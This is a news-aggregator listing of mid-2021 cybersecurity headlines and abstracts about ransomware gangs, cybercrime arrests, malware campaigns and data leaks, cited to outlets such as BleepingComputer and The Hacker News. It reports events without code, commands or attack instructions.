AlphaBay Dark Web Marketplace Claims to be Back in Business Four Years After FBI Seizure Full Text

Abstract The alleged resurrection of AlphaBay, dubbed the Amazon of the dark web, shows how difficult it can be for law enforcement agencies to keep some cybercrime venues shuttered.

Cyberscoop

August 12, 2021

Cybercriminals Use IISerpent Server-side Malware to Manipulate Search Engine Results and Conduct Fraud Full Text

Abstract Contrary to IISpy and IIStealer, IISerpent affects neither the compromised server nor the server’s users. In fact, it ignores all requests coming from legitimate visitors of the compromised sites.

ESET Security

August 11, 2021

Hacker behind biggest cryptocurrency heist ever returns stolen funds Full Text

Abstract The threat actor who hacked Poly Network's cross-chain interoperability protocol yesterday to steal over $600 million worth of cryptocurrency assets is now returning the stolen funds.

BleepingComputer

August 11, 2021

Unhappy Affiliate Spills Conti’s Attack Secrets Full Text

Abstract An affiliate of Conti ransomware leaked the manuals and technical guides—used by the gang to train new members—on a cybercrime forum owing to financial conflicts. The leaked information is said to be the holy grail of the penetration testing team working behind the Conti gang. The files were upl ... Read More

Cyware Alerts - Hacker News

August 11, 2021

Conti Ransomware Group Takes Advantage of Vulnerable Exchange Servers Full Text

Abstract Some patched on-premises Microsoft Exchange email servers are still proving to be vulnerable. Conti ransomware group is now leveraging backdoors that persist, cybersecurity firm Pondurance reports.

Gov Info Security

August 10, 2021

Cybercriminals Attack Cross-Chain DeFi Platform Poly Network and Steal Hundreds of Millions Worth of Crypto Assets Full Text

Abstract Poly Network, a protocol launched by the founder of Chinese blockchain project Neo, operates on the Binance Smart Chain, Ethereum, and Polygon blockchains. This attack struck each chain consecutively.

Coin Desk

August 5, 2021

Researchers Uncover Prometheus Traffic Distribution System Used to Propagate Multiple Malware Campaigns Full Text

Abstract A recently discovered Prometheus traffic distribution system is helping malware and cybercrime gangs distribute their malicious payloads to unsuspecting users using hacked websites.

The Record

August 05, 2021

Prometheus TDS: The $250 service behind recent malware attacks Full Text

Abstract Security researchers investigating multiple malware distribution campaigns found that an underground traffic distribution service called Prometheus is responsible for delivering threats that often lead to ransomware attacks.

BleepingComputer

August 5, 2021

Cybercriminals are manipulating reality to reshape the modern threat landscape Full Text

Abstract Defenders are struggling to counter these complex attacks and gain visibility into new environments, such as the cloud, containers, and business communication applications.

Help Net Security

August 3, 2021

BazaCall Spreading BazaLoader and Ransomware Payloads Again Full Text

Abstract Experts uncovered an attack campaign by BazaLoader operators. These attacks are tricking users into calling a particular phone number, an actual human at a fake call center, to persuade them into downloading malware. The inclusion of the human element has made this threat even more serious.

Cyware Alerts - Hacker News

August 3, 2021

With Crime-as-a-Service, anyone can be an attacker Full Text

Abstract Crime-as-a-Service is the practice of experienced cybercriminals selling access to the tools and knowledge needed to execute cybercrime – in particular, it’s often used to create phishing attacks.

Help Net Security

August 3, 2021

Raccoon Stealer Bundles Malware, Propagates Via Google SEO Full Text

Abstract An update to the stealer-as-a-service platform hides in pirated software, pilfers crypto-coins and installs a software dropper for downloads of more malware.

Threatpost

August 3, 2021

‘DeadRinger’ Targeted Exchange Servers Long Before Discovery Full Text

Abstract Cyberespionage campaigns linked to China attacked telecoms via ProxyLogon bugs, stealing call records and maintaining persistence, as far back as 2017.

Threatpost

August 2, 2021

More evidence suggests that DarkSide and BlackMatter are the same group Full Text

Abstract Researchers found evidence that the DarkSide ransomware gang has rebranded as a new BlackMatter ransomware operation. BleepingComputer found evidence that after the clamorous Colonia Pipeline attack, the DarkSide ransomware gang has rebranded as a new BlackMatter...

Security Affairs

August 2, 2021

Cybercriminals Leak 751GB Data Stolen from Electronic Arts Including Game Source Code, Internal Tools Full Text

Abstract According to a copy of the dump obtained by The Record, the leaked files contain the source code of the FIFA 21 soccer game, including tools to support the company’s server-side services.

The Record

July 31, 2021

BlackMatter ransomware gang rises from the ashes of DarkSide, REvil Full Text

Abstract ​A new ransomware gang named BlackMatter is purchasing access to corporate networks while claiming to include the best features from the notorious and now-defunct REvil and DarkSide operations.

BleepingComputer

July 30, 2021

Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems? Full Text

Abstract A recent announcement on their forum indicates that the infamous Babuk ransomware operators are now expressly targeting Linux/UNIX systems, as well as ESXi and VMware systems.

McAfee

July 30, 2021

Estonia ‘s police arrested a Tallin resident who stole 286K ID scans from a government DB Full Text

Abstract Estonia 's police arrested a man from Tallinn that is suspected to be the hacker who stole 286K ID scans from the government systems. Estonian police arrested a man from Tallinn that is suspected to have stolen 286,438 belonging to Estonians citizens...

Security Affairs

July 30, 2021

Arrests made over European ATM ‘jackpotting’ spree Full Text

Abstract Two Belarusian nationals have been arrested in connection with a spate of ATM ‘jackpotting’ attacks in which cash machines across Europe were illegally induced into dispensing €230,000 ($273,000).

The Daily Swig

July 29, 2021

Estonia arrests hacker who stole 286K ID scans from govt database Full Text

Abstract A Tallinn man was arrested a week ago in Estonia under suspicion that he has exploited a government photo transfer service vulnerability to download ID scans of 286,438 Estonians from the Identity Documents Database (KMAIS).

BleepingComputer

July 29, 2021

BlackMatter and Haron, two new ransomware gangs in the threat landscape Full Text

Abstract The cyber threat landscape change continuously, recently two new ransomware-as-service (RaaS) operations named BlackMatter and Haron made the headlines. Recently, two new ransomware gangs, named BlackMatter and Haron, announced the beginning of the operations. The...

Security Affairs

July 29, 2021

DoppelPaymer ransomware gang rebrands as the Grief group Full Text

Abstract After a period of little to no activity, the DoppelPaymer ransomware operation has made a rebranding move, now going by the name Grief (a.k.a. Pay or Grief).

BleepingComputer

July 29, 2021

New Ransomware Gangs — Haron and BlackMatter — Emerge on Cybercrime Forums Full Text

Abstract Two new ransomware-as-service (RaaS) programs have appeared on the threat radar this month, with one group professing to be a successor to  DarkSide  and  REvil , the two infamous ransomware syndicates that went off the grid following major attacks on Colonial Pipeline and Kaseya over the past few months. "The project has incorporated in itself the best features of DarkSide, REvil, and LockBit," the operators behind the new BlackMatter group said in their darknet public blog, making promises to not strike organizations in several industries, including healthcare, critical infrastructure, oil and gas, defense, non-profit, and government sectors. According to Flashpoint, the BlackMatter threat actor registered an account on Russian-language forums XSS and Exploit on July 19, quickly following it up with a post stating they are looking to purchase access to infected corporate networks comprising anywhere between 500 and 15,000 hosts in the U.S., Canada, Australia, and the U.

The Hacker News

July 29, 2021

Cybercriminals Sell Data of Unknown Number of British Columbians Stolen from Homewood Health Full Text

Abstract CTV News has confirmed at least some of the information leaked online is authentic, though the bulk of the data is still on the auction block at Marketo, a leaked data marketplace.

CTV News

July 28, 2021

BlackMatter ransomware group claims to be Darkside and REvil succesor Full Text

Abstract BlackMatter ransomware gang, a new threat actor appears in the threat landscape and claims to combine TTPs of Darkside and REvil. BlackMatter is a new ransomware gang that started its activity this week, the cybercriminals group claims to be the successor...

Security Affairs

July 25, 2021

Threat actor offers Clubhouse secret database containing 3.8B phone numbers Full Text

Abstract A threat actor is offering for sale on hacking forums the secret database Clubhouse containing 3.8B phone numbers. Clubhouse is a social audio app for iOS and Android where users can communicate in voice chat rooms that accommodate groups of thousands...

Security Affairs

July 24, 2021

AvosLocker enters the ransomware scene, asks for partners Full Text

Abstract Avos is a relatively new ransomware, that was observed in late June and early July. Its authors announced recruitment for “pentesters with Active Directory network experience" and “access brokers."

Malwarebytes Labs

July 23, 2021

Dutch Police Arrest Two Hackers Tied to “Fraud Family” Cybercrime Ring Full Text

Abstract Law enforcement authorities in the Netherlands have  arrested  two alleged individuals belonging to a Dutch cybercriminal collective who were involved in developing, selling, and renting sophisticated phishing frameworks to other threat actors in what's known as a "Fraud-as-a-Service" operation. The apprehended suspects, a 24-year-old software engineer and a 15-year-old boy, are said to have been the main developer and seller of the phishing frameworks that were employed to collect login data from bank customers. The attacks primarily singled out users in the Netherlands and Belgium. Believed to be active since at least 2020, the cybercriminal syndicate has been codenamed " Fraud Family " by cybersecurity firm Group-IB. The frameworks come with phishing kits, tools designed to steal information, and web panels, which allow the fraudsters to interact with the actual phishing site in real time and retrieve the stolen user data. "The phishing frameworks a

The Hacker News

July 22, 2021

Ransomware gang breached CNA’s network via fake browser update Full Text

Abstract Leading US insurance company CNA Financial has provided a glimpse into how Phoenix CryptoLocker operators breached its network, stole data, and deployed ransomware payloads in a ransomware attack that hit its network in March 2021.

BleepingComputer

July 22, 2021

FBI: Cybercriminals Eyeing Broadcast Disruption at Tokyo Olympics Full Text

Abstract Expected cyberattacks on Tokyo Olympics likely include attempts to hijack video feeds, the Feds warn.

Threatpost

July 22, 2021

Group-IB helps Dutch police identify members of phishing developer gang Fraud Family Full Text

Abstract Researchers from threat intelligence firm Group-IB helps Dutch police identify members of phishing developer gang known as Fraud Family. Group-IB, one of the leading providers of solutions dedicated to detecting and preventing cyberattacks, identifying...

Security Affairs

July 22, 2021

Another Hacker Arrested for 2020 Twitter Hack and Massive Bitcoin Scam Full Text

Abstract A U.K. citizen has been arrested in the Spanish town of Estepona over his alleged involvement in the July 2020 hack of Twitter, resulting in the compromise of 130 high-profile accounts. Joseph O'Connor , 22, has been  charged  with intentionally accessing a computer without authorization and obtaining information from a protected computer, as well as for making extortive communications. The Spanish National Police made the arrest pursuant to a U.S. warrant. Besides his role in the Twitter hack, O'Connor is also charged with computer intrusions related to takeovers of TikTok and Snapchat user accounts and cyberstalking an unnamed juvenile victim. The  great Twitter hack  of July 15, 2020, emerged as one of the biggest security lapses in the social media platform's history after O'Connor, along with  Mason Sheppard, Nima Fazeli, and Graham Ivan Clark , managed to gain access to Twitter's internal tools, abusing it to breach the accounts of politicians, celebritie

The Hacker News

July 21, 2021

TikTok, Snapchat account hijacker arrested for role in Twitter hack Full Text

Abstract A fourth suspect has been arrested today for his role in the Twitter hack last year that gave attackers access to the company's internal network exposing high-profile accounts to hijacking.

BleepingComputer

July 21, 2021

REvil’s Gone But its Technique is Relevant Full Text

Abstract McAfee Labs described the use of DLL sideloading in REvil’s attacks after the group made a sudden exit that surprised everyone. Generally, this technique is used by APT groups to avoid raising any flags on security radars.

Cyware Alerts - Hacker News

July 20, 2021

These are the Top Favorite CVEs of Cybercriminals Full Text

Abstract An analysis of criminal forums, where experts studied 15 cybercrime forums from January 2020 to March 2021, reveals attackers' top favorite CVEs. As per them, most of the discovered CVEs were exploited by nation-state hackers and cybercriminals. At the least, organizations must locate these flaws a ... Read More

Cyware Alerts - Hacker News

July 19, 2021

Justice Department Charges Four Chinese Nationals Working for Global Intrusion Campaign Full Text

Abstract On July 16, the Department of Justice unsealed a grand jury indictment

Lawfare

July 19, 2021

More Ransomware Gangs Use VMs to Obscure Attacks Full Text

Abstract Ransomware operators are continually refining their tactics in a bid to evade detection. This has led to a growing number of attackers relying on Virtual Machines (VMs) to run their ransomware payloads on compromised computers.

Cyware Alerts - Hacker News

July 19, 2021

HelloKitty Joins the Race of Ransomware Targeting VMware ESXi Servers Full Text

Abstract HelloKitty ransomware actors were spotted leveraging a Linux variant to target VMware’s ESXi servers and virtual machines running on the platform. The notorious ransomware gang gained popularity after targeting the Polish gaming firm CD Projekt. Organizations using such servers should implement hig ... Read More

Cyware Alerts - Hacker News

July 18, 2021

HelloKitty ransomware gang targets vulnerable SonicWall devices Full Text

Abstract BleepingComputer became aware that the recent wave of attacks targeting vulnerable SonicWall devices was carried out by HelloKitty ransomware operators. SonicWall this week has issued an urgent security alert to warn companies of “an imminent ransomware...

Security Affairs

July 17, 2021

Mespinoza Group Uses Unique Tools to Target Organizations Full Text

Abstract Palo Alto Networks provides details about the methods and tactics employed by the Mespinoza ransomware group that has been targeting multiple sectors across the globe with a focus on the education sector. The ransomware group carries out the initial access via public-facing RDP servers and prefers ... Read More

Cyware Alerts - Hacker News

July 17, 2021

US government launches plans to cut cybercriminals off from cryptocurrency Full Text

Abstract The updates on the White House’s plan to tackle ransomware comes on the heels of the third major ransomware attack to pose a serious threat to the U.S. national security in as many months.

Cyberscoop

July 16, 2021

Hacker is stealing the identities of victims, Surfside mayor says Full Text

Abstract Surfside Mayor Charles Burkett said Friday that a hacker is stealing the identities of victims who died in the condominium collapse in his city. 

The Hill

July 16, 2021

Top CVEs Trending with Cybercriminals Full Text

Abstract An analysis of criminal forums reveal what publicly known vulnerabilities attackers are most interested in.

Threatpost

July 15, 2021

Cybercriminals customizing malware for attacks on virtual infrastructure Full Text

Abstract As per research by Positive Technologies, the number of attacks increased by 17% compared to Q1 2020, with 77% being targeted attacks, and incidents with individuals accounting for 12% of the total.

Help Net Security

July 15, 2021

Spain arrests 16 for distributing the Mekotio and Grandoreiro banking trojans Full Text

Abstract The suspects were arrested last week, had their house searched, and devices seized for investigation during raids part of an operation that authorities named Aguas Vivas (Living Waters).

The Record

July 14, 2021

Watch Out! Cybercriminals are Hitting Hard at Cryptocurrency Users Full Text

Abstract Illicit cryptomining campaigns are growing strong as cybercriminals continue to evolve their attack techniques and malware. One of the main reasons for the rise is the rapidly growing investments in the cryptocurrency space.

Cyware Alerts - Hacker News

July 14, 2021

Hancitor is Using Old but Tested Tricks to Spread Malware Full Text

Abstract Mcafee Labs laid bare a new technique by Hancitor actors that involves the use of cookies to prevent URL scraping and also dropping malware such as CobaltStrike, Pony, Cuba, FickerStealer, and Zeppelin. Experts believe that it is expected to be used in future ransomware attacks and suggest erecting ... Read More

Cyware Alerts - Hacker News

July 14, 2021

Cybercriminals took advantage of WFH to target financial services companies, says Financial Stability Board report Full Text

Abstract Criminals targeted security gaps at financial services firms as their staff moved to working from home, according to a report issued by the Financial Stability Board (FSB) on Tuesday.

The Register

July 14, 2021

16 Cybercriminals Behind Mekotio and Grandoreiro Banking Trojan Arrested in Spain Full Text

Abstract Spanish law enforcement agencies on Wednesday arrested 16 individuals belonging to a criminal network in connection with operating two banking trojans as part of a social engineering campaign targeting financial institutions in Europe. The arrests were made in Ribeira (A Coruña), Madrid, Parla and Móstoles (Madrid), Seseña (Toledo), Villafranca de los barros (Badajoz), and Aranda de Duero (Burgos) following a year-long investigation, the Civil Guard said in a statement. "Through malicious software, installed on the victim's computer by the technique known as 'email spoofing', [the group] would have managed to divert large amounts of money to their accounts," authorities  noted . Computer equipment, mobile phones, and documents were confiscated, and more than 1,800 spam emails were analyzed, enabling law enforcement to block transfer attempts totaling €3.5 million successfully. The campaign is said to have netted the actors €276,470, of which €87,000 has been

The Hacker News

July 14, 2021

REvil Ransomware Gang Mysteriously Disappears After High-Profile Attacks Full Text

Abstract REvil, the infamous ransomware cartel behind some of the biggest cyberattacks targeting JBS and Kaseya, has mysteriously disappeared from the dark web, leading to speculations that the criminal enterprise may have been taken down. Multiple darknet and clearnet sites maintained by the Russia-linked cybercrime syndicate, including the data leak, extortion, and payment portals, remained inaccessible, displaying an error message "Onionsite not found."  The group's  Tor network infrastructure  on the dark web consists of one data leak blog site and 22 data hosting sites. It's not immediately clear what prompted the infrastructure to be knocked offline. REvil is one of the most prolific ransomware-as-a-service (RaaS) groups that first appeared on the threat landscape in April 2019. It's an evolution of the  GandCrab  ransomware, which hit the underground markets in early 2018. "If REvil has been permanently disrupted, it'll mark the end of a group which ha

The Hacker News

July 14, 2021

Cybercriminals Using Marvel’s Black Widow Movie to Spread Malware and Steal Payment Card Data Full Text

Abstract According to Kaspersky, several Black Widow-themed phishing sites are operating to steal user credentials. One of the sites promised the users an early preview of the movie to lure users.

Hackread

July 14, 2021

Ransom Negotiation and Data Leak Sites Operated by Attackers Behind Kaseya Hack Go Down Full Text

Abstract The ransomware hacker gang REvil’s websites are offline, about a week and a half after its attack on IT software vendor Kaseya allowed the criminals to breach hundreds of companies around the world.

Politico

July 13, 2021

Ransomware Giant REvil’s Sites Disappear Full Text

Abstract Just days after President Biden demanded that Russian President Putin shut down ransomware groups, the servers of one of the biggest groups mysteriously went dark.

Threatpost

July 13, 2021

REvil ransomware gang’s web sites mysteriously shut down Full Text

Abstract The infrastructure and websites for the REvil ransomware operation have mysteriously gone offline as of last night.

BleepingComputer

July 13, 2021

Cybercriminals steal millions in stolen crypto through scam impersonating Coinbase Full Text

Abstract An investigation by CyberNews uncovered a network of crypto wallet addresses used by a scammer group to store and cash out millions in crypto stolen from thousands of victims.

Cyber News

July 13, 2021

Scammers Poured Themselves a Glass and Got to Work on Wine-Themed Phishing Emails in 2020 Full Text

Abstract 2020 saw rising wine sales and digital scams to match. Researchers at Recorded Future and Area 1 Security witnessed an increase in wine-themed domain registrations and phishing emails since March.

Security Intelligence

July 13, 2021

Eight arrests made as Eurojust dismantles $2.4 million e-commerce fraud operation Full Text

Abstract The criminal network deployed phishing scams to dupe victims into paying for what they believed were goods and services via legitimate websites, including eBay, Amazon, and Airbnb.

The Daily Swig

July 12, 2021

Bandidos Targeting Latin America, Spying on Victims Full Text

Abstract ESET researchers took the wrap off of an ongoing espionage campaign targeting corporate networks in Spanish-speaking countries, with a focus on Venezuela. The modifications made to this malware over the years show a keen interest of Bandidos cybercriminals to keep using this malware in future campa ... Read More

Cyware Alerts - Hacker News

July 10, 2021

How REvil evolved into a ransomware collective capable of extorting Kaseya, JBS Full Text

Abstract Before claiming responsibility for a breach at the software company Kaseya, the group accounted for less than 10% of known ransomware victims, according to the threat intelligence firm Recorded Future. Now, it accounts for 42%.

Cyberscoop

July 9, 2021

Operation Lyrebird - Unfolding the Secrets of Dr HeX Full Text

Abstract INTERPOL arrested Dr. Hex under the operation Lyrebird. The accused was involved in attacks on 134 websites from 2009–2018 across multiple regions. This arrest comes as a breath of fresh air for the security community. The suspect is under investigation and more details may emerge in the futur ... Read More

Cyware Alerts - Hacker News

July 8, 2021

Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits Full Text

Abstract A threat actor has deposited 26.99 Bitcoins on one of the cybercrime forums, he aims at purchasing zero-day exploits from other forum members. A threat actor that goes online with the name “integra” has deposited 26.99 Bitcoins on one...

Security Affairs

July 08, 2021

SideCopy Hackers Target Indian Government Officials With New Malware Full Text

Abstract A cyber-espionage group has been observed increasingly targeting Indian government personnel as part of a broad campaign to infect victims with as many as four new custom remote access trojans (RATs), signaling a "boost in their development operations." Attributed to a group tracked as SideCopy, the intrusions culminate in the deployment of a variety of modular plugins, ranging from file enumerators to browser credential stealers and keyloggers (Xeytan and Lavao), Cisco Talos said in a report published Wednesday. "Targeting tactics and themes observed in SideCopy campaigns indicate a high degree of similarity to the Transparent Tribe APT (aka APT36) also targeting India," researchers Asheer Malhotra and Justin Thattil  said . "These include using decoys posing as operational documents belonging to the military and think tanks and honeytrap-based infections." First documented in September 2020 by Indian cybersecurity firm Quick Heal,  SideCopy  has a

The Hacker News

July 7, 2021

SideCopy cybercriminals use new custom Trojans in attacks against India’s military Full Text

Abstract Cisco Talos said a recent surge in activity signals a boost in the APT's development of techniques, tactics, and tools, with multiple, new remote access trojans (RATs) and plugins now in play.

ZDNet

July 7, 2021

Researchers uncovered the network infrastructure of REVil – The notorious ransomware group that hit Kaseya Full Text

Abstract Resecurity® HUNTER, cyber threat intelligence and R&D unit, identified a strong connection to a cloud hosting and IoT company servicing the domain belonging to cybercriminals. According to the recent research published by ReSecurity on Twitter,...

Security Affairs

July 7, 2021

US: We May Take Unilateral Action Against Russian Cyber-Criminals Full Text

Abstract White House says option remains if Kremlin doesn’t act

Infosecurity Magazine

July 6, 2021

Suspected Cyber-Criminal “Dr Hex” Tracked Down Via Phishing Kit Full Text

Abstract Group-IB researchers also benefitted from poor threat actor OpSec

Infosecurity Magazine

July 6, 2021

REvil Group Demands $70 Million for ‘Universal Decryptor’ Full Text

Abstract Researchers have detected 5000 attack attempts since July 2

Infosecurity Magazine

July 06, 2021

Hackers reportedly lower ransom demand to restore data to $50M Full Text

Abstract The Russia-linked ransomware gang known as REvil has reportedly lowered the amount of money it is willing to accept in exchange for data belonging to hundreds of companies worldwide that it is holding hostage.

The Hill

July 06, 2021

Interpol Arrests Moroccan Hacker Engaged in Nefarious Cyber Activities Full Text

Abstract Law enforcement authorities with the Interpol have apprehended a threat actor responsible for targeting thousands of unwitting victims over several years and staging malware attacks on telecom companies, major banks, and multinational corporations in France as part of a global phishing and credit card fraud scheme. The two-year investigation, dubbed  Operation Lyrebird  by the international, intergovernmental organization, resulted in the arrest of a Moroccan citizen nicknamed Dr HeX, cybersecurity firm Group-IB disclosed today in a report shared with The Hacker News. Dr HeX is said to have been "active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims," the cybersecurity firm said . The cyber attacks involved deploying a phishing kit consisting of web pages that spoofed banking entities in the country, followed by sending mass emails

The Hacker News

July 6, 2021

Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide Full Text

Abstract Group-IB supported INTERPOL in its Operation Lyrebird that allowed to identify a threat actor presumably responsible for multiple attacks. Group-IB, one of the leading providers of solutions dedicated to detecting and preventing cyberattacks,...

Security Affairs

July 6, 2021

Moroccan hacker Dr HeX arrested for phishing attacks, malware distribution Full Text

Abstract Moroccan authorities arrested a hacker known as “Dr HeX” for allegedly conducting website defacement, phishing attacks, and malware distribution over 12 years, Interpol announced.

The Record

July 5, 2021

Diavol Ransomware’s Connection with Wizard Spider Revealed Full Text

Abstract FortiGuard Lab associated Diavol ransomware with the Russian Wizard Spider threat actor. Experts revealed noticing Diavol and Conti payloads being used in ransomware attacks targeting different systems in early June. The connection of ransomware to already established cybercrime groups shows how ... Read More

Cyware Alerts - Hacker News

July 5, 2021

Ransomware Gangs Creating Their Own Websites to Promote Their Businesses Full Text

Abstract Two ransomware gangs Himalaya and LockBit were found promoting encryption tools on their own site after the recent ban of ransomware ads on well-known Russian-speaking cybercrime forums. To attract affiliates, the LockBit developers claim to offer the fastest encryption and file-stealing (StealBit) ... Read More

Cyware Alerts - Hacker News

July 05, 2021

REvil ransomware asks $70 million to decrypt all Kaseya attack victims Full Text

Abstract REvil ransomware has set a price for decrypting all systems locked during the Kaseya supply-chain attack. The gang wants $70 million in Bitcoin for the tool that allows all affected businesses to recover their files.

BleepingComputer

July 5, 2021

Revil ransomware gang hit Spanish telecom giant MasMovil Full Text

Abstract Revil ransomware gang hit Spanish telecom giant MasMovil and claims to have stolen sensitive data from the group. MasMovil is one of the largest Spanish telecom operators, last week the group was hit by the REvil ransomware gang that claims to have...

Security Affairs

July 04, 2021

REvil is increasing ransoms for Kaseya ransomware attack victims Full Text

Abstract The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack.

BleepingComputer

July 4, 2021

REvil gang exploited a zero-day in the Kaseya supply chain attack Full Text

Abstract Kaseya was addressing the zero-day vulnerability that REvil ransomware gang exploited to breach on-premise Kaseya VSA servers. A new supply chain attack made the headlines, on Friday the REvil ransomware gang hit the Kaseya cloud-based MSP platform...

Security Affairs

July 4, 2021

Hackers spread backdoor after compromising the Mongolian CA MonPass Full Text

Abstract Threat actors compromised the servers of Mongolian certificate authority (CA) MonPass and used its website to spread malware. Hackers compromised the servers of the Mongolian certificate authority (CA) MonPass and used its website to spread malware,...

Security Affairs

July 3, 2021

Kaseya VSA criminals may have ‘weaponized’ links in ransom negotiations Full Text

Abstract Ransomware attacks leveraging a zero-day in the on-premises Kaseya VSA remote IT management product started Friday afternoon and struck dozens of managed service providers and thousands of those MSPs customers. As one cyber expert noted: “I don’t think I have seen a ransomware gang use a 0-Day in an attack before.”

SCMagazine

July 2, 2021

Revisiting a Framework on Military Takedowns Against Cybercriminals Full Text

Abstract The U.S. military’s mission is not to carry out military operations. Its mission is to defend the nation. Cyberspace offers the military an incredibly useful capability to advance national security. Cybersecurity is national security.

Lawfare

July 2, 2021

Research partnership to examine how fraudsters abuse financial tech innovations Full Text

Abstract Federal Reserve Bank of Atlanta and GSU team will study P2P and mobile payments, e-wallets, and central bank digital currencies.

SCMagazine

July 01, 2021

Trickbot cybercrime group linked to new Diavol ransomware Full Text

Abstract FortiGuard Labs security researchers have linked a new ransomware strain dubbed Diavol to Wizard Spider, the cybercrime group behind the Trickbot botnet.

BleepingComputer

July 01, 2021

VirusTotal ordered to reveal private info of stolen HSE data downloaders Full Text

Abstract An Irish court has ordered VirusTotal to provide the information of subscribers who downloaded or uploaded confidential data stolen from Ireland's national health care service during a ransomware attack.

BleepingComputer

June 30, 2021

Hacker Wanted in the U.S. for Spreading Gozi Virus Arrested in Colombia Full Text

Abstract Colombian authorities on Wednesday said they have arrested a Romanian hacker who is wanted in the U.S. for distributing a virus that infected more than a million computers from 2007 to 2012. Mihai Ionut Paunescu (aka "Virus"), the individual in question, was detained at the El Dorado airport in Bogotá, the Office of the Attorney General of Colombia  said . Paunescu was  previously charged  by the U.S. Department of Justice (DoJ) in January 2013 for operating a bulletproof hosting service that "enabled cyber criminals to distribute the Gozi Virus, the Zeus Trojan and other notorious malware, and conduct other sophisticated cyber crimes." He was arrested in Romania in December 2012 but managed to avoid extradition to the U.S. "Through this service, Paunescu, like other bulletproof hosts, knowingly provided critical online infrastructure to cyber criminals that allowed them to commit online criminal activity with little fear of detection by law enforcement,&

The Hacker News

June 30, 2021

Colombian authorities arrested hacker behind the Gozi Virus Full Text

Abstract Colombian authorities arrested a Romanian hacker who is wanted in the U.S. for distributing the Gozi virus that already infected more than a million computers. Colombian officials announced the arrest of the Romanian hacker Mihai Ionut Paunescu who is wanted...

Security Affairs

June 30, 2021

Authorities Seize DoubleVPN Service Used by Cybercriminals Full Text

Abstract A coordinated international law enforcement operation resulted in the takedown of a VPN service called DoubleVPN for providing a safe haven for cybercriminals to cover their tracks. "On 29th of June 2021, law enforcement took down DoubleVPN," the agencies said in a seizure notice splashed on the now-defunct site. "Law enforcement gained access to the servers of DoubleVPN and seized personal information, logs and statistics kept by DoubleVPN about all of its customers. DoubleVPN's owners failed to provide the services they promised." The criminal investigation was conducted by agencies from Bulgaria, Canada, Germany, Italy, Sweden, Switzerland, the Netherlands, U.K., and the U.S., alongside authorities from Eurojust and Europol's European Cybercrime Centre (EC3). DoubleVPN is said to have been heavily advertised on both Russian and English-speaking underground cybercrime forums as a means to mask the location and identities of ransomware operators and

The Hacker News

June 30, 2021

[Webinar] How Cyber Attack Groups Are Spinning a Larger Ransomware Web Full Text

Abstract Organizations today already have an overwhelming number of dangers and threats to look out for, from spam to phishing attempts to new infiltration and ransomware tactics. There is no chance to rest, since attack groups are constantly looking for more effective means of infiltrating and infecting systems. Today, there are hundreds of groups devoted to infiltrating almost every industry, constantly devising more sophisticated methods to attack organizations. It's even more troubling to note that some groups have started to collaborate, creating complex and stealthy tactics that leave even the best security teams scrambling to respond. Such is the case noted by XDR Provider Cynet, as the company observes in its newest Research Webinar ( register here ). Cynet's research team noted that two of the most infamous attack groups – Lunar Spider and Wizard Spider – have started working together to infect organizations with ransomware. The development is certainly troubling, and the

The Hacker News

June 30, 2021

Ransomware group ‘Hades’ claims more victims as investigators seek answers Full Text

Abstract The Hades ransomware group, which is involved in big game hunting against billion-dollar companies, has claimed to have hit at least seven victims since its discovery late last year.

Cyberscoop

June 30, 2021

SolarWinds hackers remained hidden in Denmark’s central bank for months Full Text

Abstract Russia-linked threat actors compromised Denmark’s central bank (Danmarks Nationalbank) and remained in its systems for months. Russia-linked threat actors infected the systems of Denmark’s central bank (Danmarks Nationalbank) and maintained access...

Security Affairs

June 29, 2021

Ursnif Operators Leverage Cerberus to Automate Fraudulent Bank Transfers in Italy Full Text

Abstract A variant of Ursnif Trojan is being used in the wild to target online banking users in Italy. As a part of the attack, the trojan tricks desktop users into downloading an app from a fake Google Play page to infect their mobile device with the Cerberus malware. Users are recommended to avoid clickin ... Read More

Cyware Alerts - Hacker News

June 28, 2021

Could curtailing cryptocurrency calm cyber crimewave? Full Text

Abstract One of the most widely circulated policy ideas to curtail ransomware would be to treat cryptocurrencies as a bonafide component of the financial system: require cryptocurrency exchanges to abide by regulations that reduce anonymity and prevent money laundering. SC Media broke down the potential.

SCMagazine

June 28, 2021

Ransomware gangs now creating websites to recruit affiliates Full Text

Abstract Ever since two prominent Russian-speaking cybercrime forums banned ransomware-related topics [1, 2], criminal operations have been forced to promote their service through alternative methods.

BleepingComputer

June 26, 2021

New ransomware group Hive leaks Altus group sample files Full Text

Abstract On June 14th, Altus Group, a commercial real estate software solutions firm, disclosed a security breach, now Hive ransomware gang leaked its files. On June 14th, Altus Group, a commercial real estate software solutions company, has announced that...

Security Affairs

June 25, 2021

Marketo Marketplace – Cybercriminals are targeting major law firms Full Text

Abstract Cybercriminals published for sale in Dark Web 58GB of data stolen from Hollingsworth LLP. One of the emerging underground marketplaces of stolen data 'Marketo' available in TOR network announced the publication of data presumably stolen from Hollingsworth...

Security Affairs

June 25, 2021

FIN7 Pen Tester to Serve Seven Years Full Text

Abstract US sends down high-level member of hacking group behind $1bn card-stealing scheme

Infosecurity Magazine

June 25, 2021

Crackonosh Malware Author Minted $2 Million in Cryptocurrency After Infecting 222,000 Windows Systems Full Text

Abstract It has done so by hiding its malware in pirated and cracked copies of popular software, Daniel Beneš, a malware analyst for antivirus maker Avast, said in a report today.

The Record

June 24, 2021

Clop Gang Partners Laundered $500 Million in Ransomware Payments Full Text

Abstract The cybercrime ring that was apprehended last week in connection with Clop (aka Cl0p) ransomware attacks against dozens of companies in the last few months helped launder money totaling $500 million for several malicious actors through a plethora of illegal activities. "The group — also known as FANCYCAT — has been running multiple criminal activities: distributing cyber attacks; operating a high-risk exchanger; and laundering money from dark web operations and high-profile cyber attacks such as Cl0p and Petya ransomware," popular cryptocurrency exchange Binance  said  Thursday. On June 16, the Ukraine Cyber Police  nabbed six individuals  in the city of Kyiv, describing the arrests as resulting from an international operation involving law enforcement authorities from Korea, the U.S., and Interpol. While the bust was seen as a major blow to the operations of the Clop gang, the hackers published earlier this week a fresh batch of confidential employee records stolen from

The Hacker News

June 24, 2021

Cyber-stalker Blackmailed Nebraska Legislature Candidate’s Wife Full Text

Abstract Nebraskan found guilty of sending indecent images and threatening emails to Diane Parris

Infosecurity Magazine

June 24, 2021

